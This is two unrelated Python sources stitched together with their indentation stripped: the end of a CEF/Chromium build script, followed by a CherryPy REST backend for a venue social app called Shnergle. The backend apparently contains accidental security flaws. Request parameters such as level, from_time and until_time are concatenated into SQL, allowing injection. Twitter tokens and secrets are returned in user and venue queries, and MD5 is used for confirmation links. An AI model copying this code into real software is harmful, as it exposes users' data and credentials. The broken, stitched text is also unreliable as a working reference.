run('gclient sync --jobs 8 -n --force --revision=src@%s' % fetch_rev,
cwd = chromium_dir)
checkout_rev = get_git_rev_for_svn_rvn(chromium_src_dir, chromium_rev)
run('gclient sync --jobs 8 --revision=src@%s' % checkout_rev,
cwd = chromium_dir)
if not os.path.exists(cef_src_dir) or cef_url_changed:
if cef_url_changed and os.path.exists(cef_src_dir):
# delete the cef directory (it will be re-downloaded)
shutil.rmtree(cef_src_dir)
# download the CEF source code
run("git clone %s %s" % (cef_url, cef_src_dir))
elif cef_rev_changed or options.forceupdate:
# update the CEF source code
stashed = run("git stash", cwd = cef_src_dir).find(
"No local changes to save") < 0
ref = cef_rev
if ref == "None":
ref = "origin/%s" % get_current_branch(cef_src_dir)
run("git fetch origin", cwd = cef_src_dir)
run("git reset --hard %s" % ref, cwd = cef_src_dir)
if stashed:
run("git stash pop", cwd = cef_src_dir)
if any_changed or options.forceupdate:
# create CEF projects
path = os.path.join(cef_src_dir, 'cef_create_projects' + script_ext)
run(path, cwd = cef_src_dir, quiet = True)
if any_changed or options.forcebuild:
path = os.path.join(cef_tools_dir, 'build_projects' + script_ext)
if not options.nodebugbuild:
run(path +' Debug', cwd = cef_tools_dir)
if not options.noreleasebuild:
run(path +' Release', cwd = cef_tools_dir)
if any_changed or options.forcedistrib:
if not options.nodistrib:
# make CEF binary distribution
path = os.path.join(cef_tools_dir, 'make_distrib' + script_ext)
run(path, cwd = cef_tools_dir)
| |
import email.mime.text
import hashlib
import json
import math
import os
import smtplib
import cherrypy
import azureutil
import util
import v2.main
class Confirm:
@util.expose
@util.db
def index(self, cursor=None, venue_id=None, user_id=None, hashd=None,
**kwargs):
if not venue_id or not user_id or not hashd:
return 'Error!'
qry = {'select': ('name', 'email', 'phone', 'website'),
'table': 'venues',
'where': ('id = ?')}
cursor.execute(util.query(**qry), (venue_id,))
venue = cursor.fetchone()
if not venue:
return 'Error!'
qry = {'select': ('forename', 'surname'),
'table': 'users',
'where': ('id = ?')}
cursor.execute(util.query(**qry), (user_id,))
user = cursor.fetchone()
if not user:
return 'Error!'
if hashd != hashlib.md5(venue.email + '|' + str(venue_id) + '|' + str(user_id) + '|confirm|' + os.environ['APP_SECRET']).hexdigest():
return 'Error!'
qry = {'update': 'venues',
'set_values': ('email_verified'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), (1, venue_id))
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'email_confirmed.txt'), 'rb') as f:
msg = f.read()
msg = msg.replace('[EmailAddress]', venue.email)
msg = msg.replace('[PhoneNumber]', venue.phone)
msg = msg.replace('[Website]', venue.website)
msg = msg.replace('[Name]', user.forename + ' ' + user.surname)
msg = msg.replace('[VenueName]', venue.name)
subject = 'Thanks for verifying [EmailAddress], we will now complete the verification of [VenueName]'
subject = subject.replace('[EmailAddress]', venue.email)
subject = subject.replace('[VenueName]', venue.name)
msg = email.mime.text.MIMEText(msg)
msg['Subject'] = subject
msg['From'] = os.environ['EMAIL']
msg['To'] = venue.email
s = smtplib.SMTP(os.environ['SMTP_SERVER'])
s.ehlo()
s.starttls()
s.ehlo()
s.login(os.environ['SMTP_USER'], os.environ['SMTP_PASS'])
s.sendmail(msg['From'], [msg['To']], msg.as_string())
s.quit()
return 'Confirmed.'
class Image:
@util.expose
@util.protect
@util.db
@util.auth
def get(self, cursor=None, user_id=None, entity=None, entity_id=None,
**kwargs):
if not entity or not entity_id:
raise cherrypy.HTTPError(404)
if entity == 'venue':
entity = 'post'
venue_id = entity_id
subqry = {'select': 'COUNT(id)',
'table': 'post_reports',
'where': ('post_id = posts.id')}
qry = {'select': ('id', 'venue_id', 'time'),
'table': 'posts',
'where': ('venue_id = ?', 'hidden = 0',
'(' + util.query(**subqry) + ') < 3' #,
#'time > ' + str(util.now() - 691200)),
),
'order_by': 'time DESC',
'limit': 50}
cursor.execute(util.query(**qry), (entity_id,))
try:
entity_id = str(cursor.fetchone().id)
qry = {'insert_into': 'venue_loads',
'columns': ('user_id', 'venue_id', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, util.now()))
image = azureutil.retrieve(entity, entity_id)
if not image:
image = cherrypy.thread_data.placeholder_image
except:
image = cherrypy.thread_data.placeholder_image
else:
image = azureutil.retrieve(entity, entity_id)
if not image:
image = cherrypy.thread_data.placeholder_image
#if image:
# cherrypy.response.headers['Content-Type'] = 'image/jpeg'
# return image
cherrypy.response.headers['Content-Type'] = 'image/jpeg'
return image
#raise cherrypy.HTTPError(404)
class Post:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, venue_id=None, **kwargs):
if (venue_id):
subqry = {'select': 'COUNT(id)',
'table': 'post_reports',
'where': ('post_id = posts.id')}
qry = {'select': ('posts.id', 'user_id', 'posts.venue_id', 'caption',
'time', 'hidden', 'users.forename',
'users.surname'),
'left_join': 'users',
'on': 'posts.user_id = users.id',
'table': 'posts',
'where': ('posts.venue_id = ?', 'hidden = 0',
'(' + util.query(**subqry) + ') < 3' #,
#'time > ' + str(util.now() - 691200)),
),
'order_by': 'time DESC',
'limit': 50}
cursor.execute(util.query(**qry), (venue_id,))
else:
qry = {'select': ('posts.id', 'venues.name', 'posts.time'),
'left_join': 'venues',
'on': 'posts.venue_id = venues.id',
'table': 'posts',
'where': ('posts.user_id = ?'),
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (user_id,))
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, caption=None,
hide=None, post_id=None, image=None, **kwargs):
if post_id and util.to_bool(hide):
qry = {'update': 'posts',
'set_values': ('hidden'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), ('1', post_id))
return post_id
else:
qry = {'insert_into': 'posts',
'columns': ('user_id', 'venue_id', 'caption', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, caption,
util.now()))
cursor.execute(util.query(last_id=True))
post_added = int(cursor.fetchone().identity)
azureutil.store(image.file, 'post', str(post_added))
return post_added
class PostLike:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, post_id=None, **kwargs):
qry = {'select': 'id',
'table': 'post_likes',
'where': ('user_id = ?', 'post_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, post_id))
res = cursor.fetchone()
if not res:
qry = {'insert_into': 'post_likes',
'columns': ('user_id', 'post_id', 'time')}
cursor.execute(util.query(**qry), (user_id, post_id, util.now()))
return True
class PostReport:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, post_id=None, **kwargs):
qry = {'select': 'id',
'table': 'post_reports',
'where': ('user_id = ?', 'post_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, post_id))
res = cursor.fetchone()
if not res:
qry = {'insert_into': 'post_reports',
'columns': ('user_id', 'post_id')}
cursor.execute(util.query(**qry), (user_id, post_id))
return True
class PostShare:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, post_id=None, media_id=None,
**kwargs):
qry = {'insert_into': 'post_shares',
'columns': ('user_id', 'post_id', 'media_id', 'time')}
cursor.execute(util.query(**qry), (user_id, post_id, media_id,
util.now()))
return True
class PostView:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, post_id=None, **kwargs):
qry = {'insert_into': 'post_views',
'columns': ('user_id', 'post_id')}
cursor.execute(util.query(**qry), (user_id, post_id))
return True
class Promotion:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, venue_id=None, getall=None,
level=None, from_time=None, until_time=None, **kwargs):
red = {'select': 'COUNT(id)',
'table': 'promotion_redemptions',
'where': 'promotion_id = promotions.id'}
promo_qry = {'select': ['id', 'title', 'description',
'passcode', 'start', '[end]', 'maximum',
'creator', 'level',
'(' + util.query(**red) + ') AS redemptions'],
'table': 'promotions',
'where': ['venue_id = ?', 'hidden != 1'],
'order_by': 'id DESC'}
if from_time and until_time:
own_red = {'select': 'COUNT(id)',
'table': 'promotion_redemptions',
'where': ('promotion_id = promotions.id', 'time >= ' + from_time, 'time < ' + until_time, 'user_id = ' + str(user_id))}
promo_qry['select'].append('(' + util.query(**own_red) + ') AS own_redemptions')
if not util.to_bool(getall):
promo_qry['limit'] = 1
promo_qry['where'].append(str(util.now()) + ' >= start')
promo_qry['where'].append('([end] = 0 OR [end] > ' + str(util.now()) + ')')
promo_qry['where'].append('(maximum = 0 OR (' + util.query(**red) + ') < maximum)')
promo_qry['where'].append(level + ' >= level')
promo_qry['order_by'] = 'level DESC, id DESC'
cursor.execute(util.query(**promo_qry), (venue_id,))
row = cursor.fetchone()
if row:
return {t[0]: val for t, val in zip(cursor.description, row)}
else:
return None
cursor.execute(util.query(**promo_qry), (venue_id,))
return [util.row_to_dict(cursor, row) for row in cursor.fetchall()]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, delete=None,
promotion_id=None, title=None, description=None, start=None,
end=None, maximum=None, passcode=None, level=None, **kwargs):
if util.to_bool(delete) and promotion_id:
qry = {'update': 'promotions',
'set_values': ('hidden'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), (1, promotion_id))
elif promotion_id:
qry = {'update': 'promotions',
'set_values': ('title', 'description', 'start', '[end]',
'maximum', 'passcode', 'venue_id', 'level'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), (title, description, start, end,
maximum, passcode, venue_id,
level, promotion_id))
else:
qry = {'insert_into': 'promotions',
'columns': ('title', 'description', 'start', '[end]',
'maximum', 'creator', 'passcode',
'venue_id', 'level')}
cursor.execute(util.query(**qry), (title, description, start, end,
maximum, user_id, passcode,
venue_id, level))
return True
class PromotionRedemption:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, **kwargs):
qry = {'select': ('venues.name', 'promotion_redemptions.time',
'promotions.passcode', 'promotions.description'),
'left_join': ('promotions', 'venues'),
'on': ('promotion_redemptions.promotion_id = promotions.id', 'venues.id = promotions.venue_id'),
'table': 'promotion_redemptions',
'where': ('promotion_redemptions.user_id = ?'),
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (user_id,))
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, promotion_id=None, **kwargs):
cnt = {'select': ('COUNT(id)'),
'table': 'promotion_redemptions',
'where': ('promotion_id = promotions.id')}
promo = {'select': ('[end]', 'maximum', 'passcode',
'(' + util.query(**cnt) + ') AS count'),
'table': 'promotions',
'where': ('id = ?')}
cursor.execute(util.query(**promo), (promotion_id,))
row = cursor.fetchone()
if int(row.end) != 0 and int(row.end) < util.now():
return 'time'
if int(row.maximum) != 0 and int(row.count) >= int(row.maximum):
return 'number'
qry = {'insert_into': 'promotion_redemptions',
'columns': ('user_id', 'promotion_id', 'time')}
cursor.execute(util.query(**qry), (user_id, promotion_id, util.now()))
return row.passcode
class Ranking:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, **kwargs):
t = self.thresholds(cursor)
posts_total = {'select': 'COUNT(id) AS count',
'table': 'posts',
'where': 'user_id = ?'}
cursor.execute(util.query(**posts_total), (user_id,))
posts_total = cursor.fetchone().count
following_total = {'select': 'COUNT(id) AS count',
'table': 'venue_followers',
'where': 'user_id = ?'}
cursor.execute(util.query(**following_total), (user_id,))
following_total = cursor.fetchone().count
redemptions_total = {'select': 'COUNT(id) AS count',
'table': 'promotion_redemptions',
'where': 'user_id = ?'}
cursor.execute(util.query(**redemptions_total), (user_id,))
redemptions_total = cursor.fetchone().count
posts = {'select': 'COUNT(id) AS count',
'table': 'posts',
'where': ('user_id = ?', 'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**posts), (user_id,))
posts = cursor.fetchone().count
comments = {'select': 'COUNT(id) AS count',
'table': 'venue_comments',
'where': ('user_id = ?',
'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**comments), (user_id,))
comments = cursor.fetchone().count
likes = {'select': 'COUNT(id) AS count',
'table': 'post_likes',
'where': ('user_id = ?', 'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**likes), (user_id,))
likes = cursor.fetchone().count
redemptions = {'select': 'COUNT(id) AS count',
'table': 'promotion_redemptions',
'where': ('user_id = ?',
'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**redemptions), (user_id,))
redemptions = cursor.fetchone().count
share_venue = {'select': 'COUNT(id) AS count',
'table': 'venue_shares',
'where': ('user_id = ?',
'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**share_venue), (user_id,))
share_venue = cursor.fetchone().count
share_posts = {'select': 'COUNT(id) AS count',
'table': 'post_shares',
'where': ('user_id = ?',
'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**share_posts), (user_id,))
share_posts = cursor.fetchone().count
score = ((share_posts + share_venue) * 5 + posts * 4 + comments * 2 + likes * 2)
for threshold in range(len(t)):
if score < t[threshold]:
res = threshold
break
else:
res = 3
return {'thresholds': t,
'level': res,
'posts_total': posts_total,
'following_total': following_total,
'redemptions_total': redemptions_total,
'posts': posts,
'redemptions': redemptions,
'share': share_posts + share_venue,
'rsvps': 0,
'comments': comments,
'likes': likes,
'score': score}
def thresholds(self, cursor):
users = {'select': 'COUNT(id) AS count', 'table': 'users'}
cursor.execute(util.query(**users))
users = cursor.fetchone().count
thresholds = []
for percent in (0.8, 0.95, 0.99):
number = math.floor(percent * users)
venue_shares = {'select': 'COUNT(id)',
'table': 'venue_shares',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
post_shares = {'select': 'COUNT(id)',
'table': 'post_shares',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
comments = {'select': 'COUNT(id)',
'table': 'venue_comments',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
likes = {'select': 'COUNT(id)',
'table': 'post_likes',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
posts = {'select': 'COUNT(id)',
'table': 'posts',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
thresholdqry = {'select': ('((' + util.query(**venue_shares) + ') * 5 + ' +
'(' + util.query(**post_shares) + ') * 5 + ' +
'(' + util.query(**posts) + ') * 4 + ' +
'(' + util.query(**comments) + ') * 2 + ' +
'(' + util.query(**likes) + ') * 2) AS count',),
'table': 'users',
'group_by': 'id',
'order_by': 'count',
'limit': (number - 1, 1)}
cursor.execute(util.query(**thresholdqry))
count = cursor.fetchone()
thresholds.append(count.count if count else 0)
return thresholds
class User:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, term=None, **kwargs):
return self.retrieve(cursor=cursor, user_id=user_id, term=term)
def retrieve(self, cursor=None, user_id=None, term=None):
if util.to_bool(term):
qry = {'select': ['id',
'facebook_id',
'forename',
'surname'
],
'table': 'users',
'where': ("CONCAT(forename, \' \', surname) LIKE ?",),
'order_by': 'surname ASC, forename ASC'}
cursor.execute(util.query(**qry), ("%" + term.replace(' ', "%") + "%",))
return [util.row_to_dict(cursor, row) for row in cursor]
else:
qry = {'select': ['id',
'facebook',
'twitter',
'forename',
'surname',
'age',
'birth_day',
'birth_month',
'birth_year',
'gender',
'employee',
'joined',
'country',
'language',
'email',
'top5',
'save_locally',
'last_login',
'last_facebook',
'last_twitter'
],
'table': 'users',
'order_by': 'id'}
qry['select'].append('twitter_id')
qry['select'].append('twitter_token')
qry['select'].append('twitter_secret')
qry.update({'where': 'id = ?', 'limit': 1})
cursor.execute(util.query(**qry), (user_id,))
res = cursor.fetchone()
return util.row_to_dict(cursor, res)
@util.expose
@util.protect
@util.db
@util.jsonp
def set(self, cursor=None, facebook_id=None, twitter_token=None,
facebook=None, twitter=None, forename=None, surname=None, age=None,
birth_day=None, birth_month=None, birth_year=None, gender=None,
employee=None, country=None, language=None, email=None, top5=None,
twitter_id=None, twitter_secret=None, save_locally=None,
app_version=None, iphone_model=None, ios_version=None,
last_facebook=None, last_twitter=None, **kwargs):
if not facebook_id:
raise cherrypy.HTTPError(403)
qry = {'select': 'COUNT(id) AS count',
'table': 'users',
'where': 'facebook_id = ?'}
cursor.execute(util.query(**qry), (facebook_id,))
res = cursor.fetchone().count
data = {'twitter_id': twitter_id,
'twitter_token': twitter_token,
'twitter_secret': twitter_secret,
'facebook': facebook,
'twitter': twitter,
'forename': forename,
'surname': surname,
'age': util.to_int(age),
'birth_day': util.to_int(birth_day),
'birth_month': util.to_int(birth_month),
'birth_year': util.to_int(birth_year),
'gender': gender,
'employee': util.to_bool(employee),
'country': country,
'language': language,
'email': email,
'top5': util.to_bool(top5),
'save_locally': util.to_bool(save_locally),
'app_version': app_version,
'iphone_model': iphone_model,
'ios_version': ios_version,
'last_login': util.now(),
'last_facebook': util.to_bool(last_facebook),
'last_twitter': util.to_bool(last_twitter)}
columns = []
values = []
for key, val in data.iteritems():
if val != None:
columns.append(key)
if val is not True and val is not False:
values.append(val)
else:
if val:
values.append('1')
else:
values.append('0')
values.append(facebook_id)
if res:
qry = {'update': 'users',
'set_values': columns,
'where': 'facebook_id = ?'}
cursor.execute(util.query(**qry), values)
else:
columns.append('facebook_id')
columns.append('joined')
values.append(util.now())
qry = {'insert_into': 'users',
'columns': columns}
cursor.execute(util.query(**qry), values)
qry = {'select': 'id',
'table': 'users',
'where': 'facebook_id = ?',
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (facebook_id,))
user_id = cursor.fetchone().id
return self.retrieve(cursor=cursor, user_id=user_id)
class UserSearch:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, **kwargs):
qry = {'select': ('id', 'term', 'time'),
'table': 'user_searches',
'where': 'user_id = ?',
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (user_id,))
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, term=None, **kwargs):
qry = {'select': 'id',
'table': 'user_searches',
'where': ('user_id = ?', 'term = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, term))
res = cursor.fetchone()
if res:
qry = {'update': 'user_searches',
'set_values': ('time'),
'where': 'user_id = ?'}
cursor.execute(util.query(**qry), (util.now(), user_id))
else:
qry = {'insert_into': 'user_searches',
'columns': ('user_id', 'term', 'time')}
cursor.execute(util.query(**qry), (user_id, term, util.now()))
return True
class Venue:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, term=None, following_only=None,
my_lat=None, my_lon=None, distance=None, own=None, quiet=None,
trending=None, from_time=None, until_time=None, promotions=None,
level=None, around_me=None, **kwargs):
subqry = {'select': 'COUNT(id)',
'table': 'venue_followers',
'where': ('user_id = ' + str(user_id),
'venue_id = venues.id')}
red = {'select': 'COUNT(id)',
'table': 'promotion_redemptions',
'where': 'promotion_id = promotions.id'}
promoqry = {'select': 'COUNT(id)',
'table': 'promotions',
'where': ('venue_id = venues.id',
str(util.now()) + ' >= start',
'([end] = 0 OR [end] > ' + str(util.now()) + ')',
'(maximum = 0 OR (' + util.query(**red) + ') < maximum)',
level + ' >= level',
'hidden != 1')}
managerqry = {'select': 'COUNT(id)',
'table': 'venue_managers',
'where': ('user_id = ' + str(user_id),
'venue_id = venues.id')}
staffqry = {'select': 'COUNT(id)',
'table': 'venue_staff',
'where': ('user_id = ' + str(user_id),
'venue_id = venues.id')}
staffppqry = {'select': 'SUM(promo_perm)',
'table': 'venue_staff',
'where': ('user_id = ' + str(user_id),
'venue_id = venues.id')}
fields = ['id', 'name', 'address', 'country', 'phone', 'email',
'email_verified', 'category_id', 'headline', 'tonight',
'website', 'facebook', 'twitter', 'facebook_id',
'twitter_id', 'twitter_token', 'twitter_secret', 'lat',
'lon', 'official', 'verified', 'customer_spend',
'authenticated', 'creator',
'(' + util.query(**managerqry) + ') AS manager',
'(' + util.query(**staffqry) + ') AS staff',
'(' + util.query(**staffppqry) + ') AS promo_perm',
"(" + util.query(**subqry) + ") AS following",
'(' + util.query(**promoqry) + ') AS promotions']
order_by = ('name ASC',)
if term:
where = ("name LIKE ?",)
elif util.to_bool(following_only):
where = ("(" + util.query(**subqry) + ") > 0")
elif own:
where = ('(' + util.query(**managerqry) + ') = 1 OR (' + util.query(**staffqry) + ') = 1')
elif my_lat and my_lon and distance:
maybe = {'select': 'COUNT(id)',
'table': 'venue_rsvps',
'where': ('maybe = 1', 'venue_id = venues.id',
'going = 0', 'time >= ?', 'time < ?')}
going = {'select': 'COUNT(id)',
'table': 'venue_rsvps',
'where': ('going = 1', 'venue_id = venues.id',
'time >= ?', 'time < ?')}
if util.to_bool(quiet):
order_by = ('(' + util.query(**maybe) +') + (' + util.query(**going) +') * 2 ASC',)
elif util.to_bool(trending):
order_by = ('(' + util.query(**maybe) +') + (' + util.query(**going) +') * 2 DESC',)
else:
order_by = ('((lat - ?) * (lat - ?) + (lon - ?) * (lon - ?)) ASC',)
where = ('((lat - ?) * (lat - ?) + (lon - ?) * (lon - ?)) <= ? * ?',)
if util.to_bool(promotions):
where += ('(' + util.query(**promoqry) + ') > 0',)
elif util.to_bool(quiet) or util.to_bool(trending):
fields[0] = 'TOP(12) id'
elif util.to_bool(around_me):
psubqry = {'select': 'COUNT(id)',
'table': 'post_reports',
'where': ('post_id = posts.id')}
post_count = {'select': 'CASE WHEN COUNT(id) > 0 THEN 1 ELSE 0 END',
'table': 'posts',
'where': ('posts.venue_id = venues.id',
'hidden = 0',
'(' + util.query(**psubqry) + ') < 3',
'time > ' + str(util.now() - 691200))}
order_by = ('(' + util.query(**post_count) + ') DESC',) + order_by
else:
where = ''
qry = {'select': fields,
'table': 'venues',
'where': where,
'order_by': order_by}
if term:
cursor.execute(util.query(**qry), ("%" + term + "%",))
return [util.row_to_dict(cursor, row) for row in cursor]
else:
values = tuple()
if my_lat and my_lon and distance:
values += (float(my_lat), float(my_lat), float(my_lon),
float(my_lon), float(distance), float(distance))
if util.to_bool(quiet) is None and util.to_bool(trending) is None:
values += (float(my_lat), float(my_lat), float(my_lon),
float(my_lon))
else:
values += (from_time, until_time, from_time, until_time)
cursor.execute(util.query(**qry), values)
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, facebook_id=None, user_id=None, venue_id=None,
name=None, address=None, country=None, phone=None, email=None,
email_verified=None, category_id=None, headline=None, tonight=None,
website=None, facebook=None, twitter=None, v_facebook_id=None,
twitter_id=None, twitter_token=None, twitter_secret=None, lat=None,
lon=None, official=None, verified=None, customer_spend=None,
authenticated=None, creator_version=None, **kwargs):
data = {'name': name,
'address': address,
'country': country,
'phone': phone,
'email': email,
'email_verified': util.to_bool(email_verified),
'category_id': util.to_int(category_id),
'headline': headline,
'tonight': tonight,
'website': website,
'facebook': facebook,
'twitter': twitter,
'facebook_id': v_facebook_id,
'twitter_id': twitter_id,
'twitter_token': twitter_token,
'twitter_secret': twitter_secret,
'lat': util.to_float(lat),
'lon': util.to_float(lon),
'official': util.to_bool(official),
'verified': util.to_bool(verified),
'customer_spend': util.to_float(customer_spend),
'authenticated': util.to_bool(authenticated),
'creator': user_id,
'creator_version': creator_version}
columns = []
values = []
for key, val in data.iteritems():
if val != None:
columns.append(key)
values.append(val)
if venue_id:
qry = {'update': 'venues',
'set_values': columns,
'where': 'id = ?'}
values.append(venue_id)
cursor.execute(util.query(**qry), values)
else:
qry = {'insert_into': 'venues',
'columns': columns}
cursor.execute(util.query(**qry), values)
cursor.execute(util.query(last_id=True))
return int(cursor.fetchone().identity)
class VenueCategory:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, **kwargs):
qry = {'select': ('id', 'type'),
'table': 'venue_categories',
'where': '',
'order_by': 'type ASC'}
cursor.execute(util.query(**qry))
return [util.row_to_dict(cursor, row) for row in cursor]
class VenueComment:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, venue_id=None, **kwargs):
nameqry = {'select': ('CONCAT(forename, \' \', SUBSTRING(surname, 1, 1))',),
'table': 'users',
'where': ('users.id = venue_comments.user_id',)}
fbidqry = {'select': ('facebook_id',),
'table': 'users',
'where': ('users.id = venue_comments.user_id',)}
qry = {'select': ('id', 'user_id', 'venue_id', 'time', 'comment',
'(' + util.query(**nameqry) + ') AS name',
'(' + util.query(**fbidqry) + ') AS facebook_id'),
'table': 'venue_comments',
'where': ('venue_id = ?',),
'order_by': 'time DESC',
'limit': 10}
cursor.execute(util.query(**qry), (venue_id,))
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, comment=None,
**kwargs):
qry = {'insert_into': 'venue_comments',
'columns': ('user_id', 'venue_id', 'time', 'comment')}
cursor.execute(util.query(**qry), (user_id, venue_id, util.now(),
comment))
return True
class VenueFollower:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, following=None,
**kwargs):
qry = {'select': 'id',
'table': 'venue_followers',
'where': ('user_id = ?', 'venue_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, venue_id))
res = cursor.fetchone()
if util.to_bool(following) and not res:
qry = {'insert_into': 'venue_followers',
'columns': ('user_id', 'venue_id')}
cursor.execute(util.query(**qry), (user_id, venue_id))
elif not util.to_bool(following) and res:
qry = {'delete': 'venue_followers',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (user_id, venue_id))
return True
class VenueManager:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, **kwargs):
qry = {'select': 'id',
'table': 'venue_managers',
'where': ('user_id = ?', 'venue_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, venue_id))
res = cursor.fetchone()
if not res:
qry = {'insert_into': 'venue_managers',
'columns': ('user_id', 'venue_id', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, util.now()))
qry = {'update': 'venues',
'set_values': ('official'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), (1, venue_id))
qry = {'select': ('name', 'email'),
'table': 'venues',
'where': ('id = ?')}
cursor.execute(util.query(**qry), (venue_id,))
venue = cursor.fetchone()
qry = {'select': ('forename', 'surname'),
'table': 'users',
'where': ('id = ?')}
cursor.execute(util.query(**qry), (user_id,))
user = cursor.fetchone()
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'email_confirm.txt'), 'rb') as f:
msg = f.read()
msg = msg.replace('[Name]', user.forename + ' ' + user.surname)
msg = msg.replace('[VenueName]', venue.name)
msg = msg.replace('[Link]', 'https://shnergle-api.azurewebsites.net/confirm/?venue_id=' + str(venue_id) + '&user_id=' + str(user_id) + '&hashd=' + hashlib.md5(venue.email + '|' + str(venue_id) + '|' + str(user_id) + '|confirm|' + os.environ['APP_SECRET']).hexdigest())
subject = 'Verify Email Address ownership for [VenueName] on Shnergle'
subject.replace('[VenueName]', venue.name)
msg = email.mime.text.MIMEText(msg)
msg['Subject'] = subject
msg['From'] = os.environ['EMAIL']
msg['To'] = venue.email
s = smtplib.SMTP(os.environ['SMTP_SERVER'])
s.ehlo()
s.starttls()
s.ehlo()
s.login(os.environ['SMTP_USER'], os.environ['SMTP_PASS'])
s.sendmail(msg['From'], [msg['To']], msg.as_string())
s.quit()
return True
class VenueRsvp:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, venue_id=None, from_time=None, until_time=None,
own=None, user_id=None, **kwargs):
qry = {'select': 'COUNT(id) AS cnt',
'table': 'venue_rsvps',
'where': ('venue_id = ?', 'maybe = 1', 'going = 0',
'time >= ?', 'time < ?')}
values = (venue_id, from_time, until_time)
if util.to_bool(own):
qry['where'] += ('user_id = ?',)
values += (user_id,)
cursor.execute(util.query(**qry), values)
maybe = cursor.fetchone().cnt
qry = {'select': 'COUNT(id) AS cnt',
'table': 'venue_rsvps',
'where': ('venue_id = ?', 'going = 1',
'time >= ?', 'time < ?')}
if util.to_bool(own):
qry['where'] += ('user_id = ?',)
cursor.execute(util.query(**qry), values)
going = cursor.fetchone().cnt
return {'maybe': maybe, 'going': going}
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, maybe=None,
going=None, from_time=None, until_time=None, **kwargs):
qry = {'select': 'id',
'table': 'venue_rsvps',
'where': ('user_id = ?', 'venue_id = ?',
'time >= ?', 'time < ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, venue_id, from_time,
until_time))
res = cursor.fetchone()
if res:
values = []
columns = []
if maybe:
values.append(util.to_bool(maybe))
columns.append('maybe')
if going:
values.append(util.to_bool(going))
columns.append('going')
values.append(res.id)
qry = {'update': 'venue_rsvps',
'set_values': columns,
'where': 'id = ?'}
cursor.execute(util.query(**qry), values)
else:
values = [user_id, venue_id, util.now()]
columns = ['user_id', 'venue_id', 'time']
if maybe:
values.append(util.to_bool(maybe))
columns.append('maybe')
if going:
values.append(util.to_bool(going))
columns.append('going')
qry = {'insert_into': 'venue_rsvps',
'columns': columns}
cursor.execute(util.query(**qry), values)
return True
class VenueShare:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
